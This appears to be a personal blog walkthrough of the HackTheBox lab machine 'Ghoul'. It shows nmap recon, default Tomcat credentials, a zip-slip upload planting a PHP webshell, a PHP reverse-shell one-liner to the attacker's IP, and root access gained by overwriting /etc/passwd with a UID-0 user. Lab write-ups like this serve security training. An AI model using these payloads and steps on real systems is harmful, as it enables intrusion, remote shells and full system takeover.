dennis@home:~$

Archive

About

RSS

    Ghoul HackTheBox

    Recon

    # nmap -sC -sV -Ao nmap 10.10.10.101

# Nmap 7.92 scan initiated Tue Sep 27 15:23:09 2022 as: nmap -sC -sV -Ao nmap.again 10.10.10.101
Nmap scan report for 10.10.10.101
Host is up (0.090s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c1:1c:4b:0c:c6:de:ae:99:49:15:9e:f9:bc:80:d2:3f (RSA)
|_  256 a8:21:59:7d:4c:e7:97:ad:78:51:da:e5:f0:f9:ab:7d (ECDSA)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Aogiri Tree
|_http-server-header: Apache/2.4.29 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 63:59:8b:4f:8d:0a:e1:15:44:14:57:27:e7:af:fb:3b (RSA)
|   256 8c:8b:a0:a8:85:10:3d:27:07:51:29:ad:9b:ec:57:e3 (ECDSA)
|_  256 9a:f5:31:4b:80:11:89:26:59:61:95:ff:5c:68:bc:a7 (ED25519)
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Aogiri
|_http-title: Apache Tomcat/7.0.88 - Error report
|_http-server-header: Apache-Coyote/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    open ports

    • port 22 = ssh
    • port 80 = http website
    • port 2222 = another ssh
    • port 8080 = tomcat

    enumerating the tomcat

    Browsing to port 8080 asks for a username/password. Trying some default combinations reveals that admin:admin is the right choice. On this application you can upload images and zip files which is interesting. An idea is to create a zip file with a zip slip vulnerablility and upload it to the server. Because there is an apache webserver you can assume it takes files from /var/www/html. So you can take a php webshell like:

    <?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

    and zip it with zip shell.zip ../../../../../../../../../var/www/html/shell.php

    This ensures that the zip files gets unzipped at the given directory.

    playing around with the webshell

    By browsing to 10.10.10.101/shell.php the webserver responds with the usage guide which indicates that the webshell is working. This is because we set the directory to /var/www/html which is the default directory for the apache webserver.

    So now we can execute commands on the target system by sending them as GET parameter in the URL. Testing it with 10.10.10.101/shell.php?cmd=cat+/etc/passwd reveals the passwd file.

    To establish a reverse shell you can now set up a listener and browse to 10.10.10.101/shell.php?cmd=php+-r+'$sock%3dfsockopen("10.10.15.22",4000)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' (note the url encodeing)

    get user from www-data

    Looking around you can notice that our shell.php was created by root. This means that the unzip was executed with root privileges which comes in handy.

    -rw-r--r-- 1 root root    328 Sep 28 07:52 shell.php

    So we can create a new user with root privileges by extending the /etc/passwd file.

    To create a password for a new user we can use openssl passwd AAAA where AAAA is the password. We create a new passwd file on our local maschine with the entrys of the target and append a new user with the created password.

    ╭─ ~/HTB/Ghoul ·················································································· ✔
╰─ wget http://10.10.10.101/shell.php\?cmd\=cat+/etc/passwd -O passwd
--2022-09-28 14:59:27--  http://10.10.10.101/shell.php?cmd=cat+/etc/passwd
Verbindungsaufbau zu 10.10.10.101:80 … verbunden.
HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK
Länge: 1426 (1,4K) [text/html]
Wird in »passwd« gespeichert.

passwd                     100%[======================================>]   1,39K  --.-KB/s    in 0s

2022-09-28 14:59:27 (162 MB/s) - »passwd« gespeichert [1426/1426]


╭─ ~/HTB/Ghoul ·················································································· ✔
╰─ echo "hacker:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash" >> passwd
    1. Get rid of the <pre> tags
    2. Make a backup of your current /etc/passwd file and move your created passwd file there
    3. zip the new /etc/passwd with zip passwd.zip ../../../../../../../../etc/passwd and upload the zip created zip file
    4. Restore your old passwd file

    If there are problems with your user because you aren’t part of the sudoers anymore use su to become root

    mv /etc/passwd /etc/passwd.old
mv ~/HTB/Ghoul/passwd /etc/passwd
zip passwd.zip ../../../../../../../../etc/passwd
mv /etc/passwd.old /etc/passwd

    Now on the target maschine you can su hacker and type the created password AAAA.

    The user flag is in kaneki’s home directory